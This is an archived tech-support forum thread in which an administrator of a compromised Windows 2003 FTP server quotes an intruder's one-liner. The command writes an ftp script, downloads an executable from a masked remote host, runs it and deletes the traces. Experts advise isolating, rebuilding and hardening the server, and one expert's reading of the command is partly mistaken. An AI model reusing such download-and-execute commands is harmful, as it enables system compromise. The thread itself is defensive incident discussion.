Still celebrating National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17

x
?
Solved

FTP server - possible virus/backdoor/trojan?

Posted on 2006-11-30
8
Medium Priority
?
856 Views
Last Modified: 2013-12-04
I have a standard fully patched Windwos 2003 Server running as an FTP server, I have done a full virus and spywear scan but everyso often I log in va VNC and there will be a command prompt open with the following text:


Could Not Find C:\Documents and Settings\Administrator\i
ftp> open xx.xx.xxx.xxx 4235
Connected to xx.xx.xxx.xxx.
220 Reptile welcomes you..
ftp> user 1 1
331 Password required
230 User logged in.
ftp> get 532.exe
200 PORT command successful.
150 Opening BINARY mode data connection


This is VERY worrying - and I cant find a lot of info about it - I admit my IIS installation may not be very secure - can someone advise me on this issue?
0
Comment
Question by:STEVEO5
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
8 Comments
 
LVL 11

Expert Comment

by:Kruno Džoić
ID: 18053290
services.msc, and check for services with letters ftp or strange services ( use google to indentify services )
0
 

Author Comment

by:STEVEO5
ID: 18053506
Had a look - couldnt find anythign strange - although i noticed this command in the Start, run dialogue and I didnt type it - any ideas?


cmd.exe /c del i&echo open xx.xx.xxx.xxx 6745 > i&echo user 1 1 >> i &echo get 870.exe >> i &echo quit >> i &ftp -n -s:i &870.exe&del i&exit
0
 
LVL 12

Expert Comment

by:Phil_Agcaoili
ID: 18060208
Do you have a firewall in front of this server?
If not, you NEED a fw.
If so, what do the logs say that is going on to/from this FTP server?

I bet someone has compromised your system and is uploading/downloading to/from it based on what you see.

I would:
- Remove this server from the network
- Rebuild this FTP server, patch it and follow an Internet server hardening guide
- Install a network fw in front of it and limit access to the rebuilt  FTP server
- Monitor network activity just in case other systems have been compromised

0
Concerto Cloud for Software Providers & ISVs

Can Concerto Cloud Services help you focus on evolving your application offerings, while delivering the best cloud experience to your customers? From DevOps to revenue models and customer support, the answer is yes!

Learn how Concerto can help you.

 
LVL 9

Expert Comment

by:maninblac1
ID: 18062963
Well, it's difficult for me to tell you exactly what's going on, it sure looks like a hack.

But the thing i can tell you is it's likely the hacker is coming from a computer that is running UNIX

UNIX (and maybe linux as well i'm not 100% sure) ftp requires the connection to enter "BINARY mode" to transfer data, that was a big tip off to me, is that your server is 2003 and yet it is in binary mode something odd for a windows box to my knowledge

Is this a FTP server with logon requied?  If so doesn't windows transmit FTP user/passwords in plain text so a packet sniffer could have sniffed out a login and is now accessing your FTP.

Check your logs for connections and the users who connected you may find your answers there.

In fact either this is a script, or it's definately a hack, the command flags indicate suspicious behavour, running the command then closing the prompt "cmd.exe /c" then he get's a file 870.exe off of a remote sever.  Then he does "ftp -n -s" supresses the login and runs the executable with the -s command, then exits the command.

I'd say look for the file 870.exe but it appears that he deletes it before he leaves.  I'd beef up security definately.
0
 

Author Comment

by:STEVEO5
ID: 18066971
Server is behind a router/firewall.

Can you advise on a server hardening guide?

My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet
0
 
LVL 12

Accepted Solution

by:
Phil_Agcaoili earned 2000 total points
ID: 18074621
Follow the 2003 server hardening guides here: http://support.microsoft.com/default.aspx/kb/885409

Ok, did you verify that the firewall is only allowing access to the FTP service on this server?
If not, you need to scan your server from the Net and verify that you're only serving FTP.

This was troubling and also part of why you were just hacked:
"My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet"

Anything on a network and especially something connected to the Internet requires authentication.

Anonymous access access to FTP is somewhat fine these days, but access to virtual directories should always be authenticated.
0
 
LVL 1

Expert Comment

by:Computer101
ID: 21101050
Forced accept.

Computer101
EE Admin
0

Featured Post

Comprehensive Backup Solutions for Microsoft

Acronis protects the complete Microsoft technology stack: Windows Server, Windows PC, laptop and Surface data; Microsoft business applications; Microsoft Hyper-V; Azure VMs; Microsoft Windows Server 2016; Microsoft Exchange 2016 and SQL Server 2016.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

The term "Bad USB" is a buzz word that is usually used when talking about attacks on computer systems that involve USB devices. In this article, I will show what possibilities modern windows systems (win8.x and win10) offer to fight these attacks wi…
Our Group Policy work started with Small Business Server in 2000. Microsoft gave us an excellent OU and GPO model in subsequent SBS editions that utilized WMI filters, OU linking, and VBS scripts. These are some of experiences plus our spending a lo…
In this brief tutorial Pawel from AdRem Software explains how you can quickly find out which services are running on your network, or what are the IP addresses of servers responsible for each service. Software used is freeware NetCrunch Tools (https…
Have you created a query with information for a calendar? ... and then, abra-cadabra, the calendar is done?! I am going to show you how to make that happen. Visualize your data!  ... really see it To use the code to create a calendar from a q…

721 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question